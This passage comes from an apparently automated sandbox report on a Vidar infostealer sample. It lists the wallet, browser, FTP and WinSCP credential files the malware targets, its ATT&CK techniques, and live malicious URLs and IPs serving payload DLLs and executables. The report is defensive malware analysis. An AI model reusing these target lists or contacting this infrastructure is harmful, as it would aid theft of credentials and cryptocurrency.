Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Tries to harvest and steal Bitcoin Wallet information
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                        Tries to harvest and steal ftp login credentials
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                        Tries to steal Crypto Currency Wallets
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                        Source: Yara matchFile source: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6508, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected Vidar
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Yara detected Vidar stealer
                        Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.3fe5570.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.3fe5570.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.2060446715.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 6128, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6508, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C280C40 sqlite3_bind_zeroblob,2_2_6C280C40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C280D60 sqlite3_bind_parameter_name,2_2_6C280D60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1A8EA0 sqlite3_clear_bindings,2_2_6C1A8EA0

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		1
                        Disable or Modify Tools                        		2
                        OS Credential Dumping                        		2
                        System Time Discovery                        		Remote Services1
                        Archive Collected Data                        		2
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts11
                        Native API                        		Boot or Logon Initialization Scripts511
                        Process Injection                        		1
                        Deobfuscate/Decode Files or Information                        		1
                        Credentials in Registry                        		1
                        Account Discovery                        		Remote Desktop Protocol4
                        Data from Local System                        		21
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)4
                        Obfuscated Files or Information                        		Security Account Manager4
                        File and Directory Discovery                        		SMB/Windows Admin Shares1
                        Screen Capture                        		3
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                        Software Packing                        		NTDS54
                        System Information Discovery                        		Distributed Component Object ModelInput Capture114
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading                        		LSA Secrets151
                        Security Software Discovery                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Masquerading                        		Cached Domain Credentials31
                        Virtualization/Sandbox Evasion                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                        Virtualization/Sandbox Evasion                        		DCSync12
                        Process Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job511
                        Process Injection                        		Proc Filesystem1
                        Application Window Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                        System Owner/User Discovery                        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1519637 Sample: file.exe Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 25 steamcommunity.com 2->25 27 dbsmena.com 2->27 35 Suricata IDS alerts for network traffic 2->35 37 Found malware configuration 2->37 39 Antivirus detection for URL or domain 2->39 41 9 other signatures 2->41 7 file.exe 2 2->7         started        signatures3 process4 signatures5 43 Contains functionality to inject code into remote processes 7->43 45 Writes to foreign memory regions 7->45 47 Allocates memory in foreign processes 7->47 49 Injects a PE file into a foreign processes 7->49 10 RegAsm.exe 221 7->10         started        15 conhost.exe 7->15         started        process6 dnsIp7 29 5.75.211.162, 443, 49716, 49717 HETZNER-ASDE Germany 10->29 31 steamcommunity.com 104.102.49.254, 443, 49715 AKAMAI-ASUS United States 10->31 33 dbsmena.com 172.105.54.160, 443, 49739 LINODE-APLinodeLLCUS United States 10->33 17 C:\Users\user\AppData\...\ljhgfsd[1].exe, PE32 10->17 dropped 19 C:\ProgramData\vcruntime140.dll, PE32 10->19 dropped 21 C:\ProgramData\softokn3.dll, PE32 10->21 dropped 23 5 other files (none is malicious) 10->23 dropped 51 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 10->51 53 Found many strings related to Crypto-Wallets (likely being stolen) 10->53 55 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->55 57 5 other signatures 10->57 file8 signatures9

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        No Antivirus matches

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\ProgramData\freebl3.dll0%ReversingLabs
                        C:\ProgramData\mozglue.dll0%ReversingLabs
                        C:\ProgramData\msvcp140.dll0%ReversingLabs
                        C:\ProgramData\nss3.dll0%ReversingLabs
                        C:\ProgramData\softokn3.dll0%ReversingLabs
                        C:\ProgramData\vcruntime140.dll0%ReversingLabs

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                        https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                        https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
                        https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
                        https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&0%URL Reputationsafe
                        https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
                        https://5.75.211.162/mozglue.dll100%Avira URL Cloudmalware
                        https://store.steampowered.com/subscriber_agreement/0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e0%Avira URL Cloudsafe
                        https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english0%URL Reputationsafe
                        https://steamcommunity.com/?subsection=broadcasts0%Avira URL Cloudsafe
                        https://steamcommunity.com/profiles/76561199780418869/badges100%Avira URL Cloudmalware
                        https://mozilla.org0/0%URL Reputationsafe
                        https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%Avira URL Cloudsafe
                        http://www.valvesoftware.com/legal.htm0%Avira URL Cloudsafe
                        http://cowod.hopto.org_DEBUG.zip/c0%Avira URL Cloudsafe
                        http://www.entrust.net/rpa030%URL Reputationsafe
                        http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                        https://www.ecosia.org/newtab/0%URL Reputationsafe
                        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%Avira URL Cloudsafe
                        https://5.75.211.162AAAFC0%Avira URL Cloudsafe
                        https://dbsmena.com/ljhgfsd.exea;0%Avira URL Cloudsafe
                        https://5.75.211.162/freebl3.dll100%Avira URL Cloudmalware
                        https://5.75.211.162/vcruntime140.dll100%Avira URL Cloudmalware
                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                        https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
                        https://steamcommunity.com/profiles/7656119978041886950%Avira URL Cloudsafe
                        https://steamcommunity.com/profiles/76561199780418869$0%Avira URL Cloudsafe
                        https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.00%Avira URL Cloudsafe
                        https://5.75.211.162100%Avira URL Cloudmalware
                        https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
                        https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
                        http://www.mozilla.com/en-US/blocklist/0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english0%URL Reputationsafe
                        https://store.steampowered.com/privac0%Avira URL Cloudsafe
                        https://t.me/ae5ed100%Avira URL Cloudmalware
                        https://dbsmena.com/ljhgfsd.exefCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0b0%Avira URL Cloudsafe
                        https://store.steampowered.com/points/shop/0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis0%URL Reputationsafe
                        http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                        https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
                        https://www.entrust.net/rpa00%URL Reputationsafe
                        https://store.steampowered.com/about/0%URL Reputationsafe
                        https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english0%URL Reputationsafe
                        http://ocsp.entrust.net030%URL Reputationsafe
                        http://ocsp.entrust.net020%URL Reputationsafe
                        https://store.steampowered.com/privacy_agreement/0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en0%Avira URL Cloudsafe
                        https://help.steampowered.com/en/0%URL Reputationsafe
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                        https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref0%Avira URL Cloudsafe
                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL0%Avira URL Cloudsafe
                        http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                        https://dbsmena.com/ljhgfsd.exe1kkkk1218740https://dbsmena.com/vdshfd.exe1kkkk783966f7e542580%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde74770%Avira URL Cloudsafe
                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                        https://steamcommunity.com/my/wishlist/0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english0%Avira URL Cloudsafe
                        http://crl.entrust.net/ts1ca.crl00%URL Reputationsafe
                        https://dbsmena.com/ljhgfsd.exe)0%Avira URL Cloudsafe
                        https://store.steampowered.com/legal/0%URL Reputationsafe
                        https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e0%URL Reputationsafe
                        http://www.sqlite.org/copyright.html.0%URL Reputationsafe
                        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl0%URL Reputationsafe
                        https://steamcommunity.com/market/0%Avira URL Cloudsafe
                        http://aia.entrust.net/ts1-chain256.cer010%URL Reputationsafe
                        https://store.steampowered.com/news/0%Avira URL Cloudsafe
                        https://5.75.211.162rt/form-data;0%Avira URL Cloudsafe
                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
                        https://dbsmena.com/ljhgfsd.exe?0%Avira URL Cloudsafe
                        https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org0%Avira URL Cloudsafe
                        https://5.75.211.162/softokn3.dll6V#~100%Avira URL Cloudmalware
                        https://5.75.211.162AKKJD0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en0%Avira URL Cloudsafe
                        https://steamcommunity.com/profiles/76561199780418869/inventory/100%Avira URL Cloudmalware
                        https://steamcommunity.com/discussions/0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a0%Avira URL Cloudsafe
                        https://steamcommunity.com/profiles/76561199780418869100%Avira URL Cloudmalware
                        https://store.steampowered.com/stats/0%Avira URL Cloudsafe
                        https://dbsmena.com/ljhgfsd.exe0%Avira URL Cloudsafe
                        https://5.75.211.162/xmx~3100%Avira URL Cloudmalware
                        https://steamcommunity.com/60%Avira URL Cloudsafe
                        https://store.steampowered.com/steam_refunds/0%Avira URL Cloudsafe
                        https://dbsmena.com/vdshfd.exetent-Disposition:0%Avira URL Cloudsafe
                        https://5.75.211.162/softokn3.dll100%Avira URL Cloudmalware
                        https://steamcommunity.com/workshop/0%Avira URL Cloudsafe
                        https://5.75.211.162/sqlp.dll100%Avira URL Cloudmalware
                        https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%Avira URL Cloudsafe
                        https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                        https://dbsmena.com/0%Avira URL Cloudsafe
                        https://5.75.211.162/msvcp140.dll100%Avira URL Cloudmalware
                        https://steamcommunity.com/login/home/?goto=profiles%2F765611997804188690%Avira URL Cloudsafe
                        https://5.75.211.162EBFBA0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        steamcommunity.com
                        		104.102.49.254
                        		truetrue
                          		unknown
                          dbsmena.com
                          		172.105.54.160
                          		truefalse
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://5.75.211.162/mozglue.dlltrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://5.75.211.162/freebl3.dlltrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://5.75.211.162/vcruntime140.dlltrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://steamcommunity.com/profiles/76561199780418869true
                            • Avira URL Cloud: malware
                            		unknown
                            https://dbsmena.com/ljhgfsd.exefalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://5.75.211.162/softokn3.dlltrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://5.75.211.162/sqlp.dlltrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://5.75.211.162/msvcp140.dlltrue
                            • Avira URL Cloud: malware
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://duckduckgo.com/chrome_newtabAAAAKJ.2.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://duckduckgo.com/ac/?q=AAAAKJ.2.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://steamcommunity.com/?subsection=broadcastsRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.RegAsm.exe, 00000002.00000002.3293998119.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, CFHDBF.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=eRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://steamcommunity.com/profiles/76561199780418869/badgesRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drtrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.valvesoftware.com/legal.htmRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://cowod.hopto.org_DEBUG.zip/cfile.exe, 00000000.00000002.2060446715.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
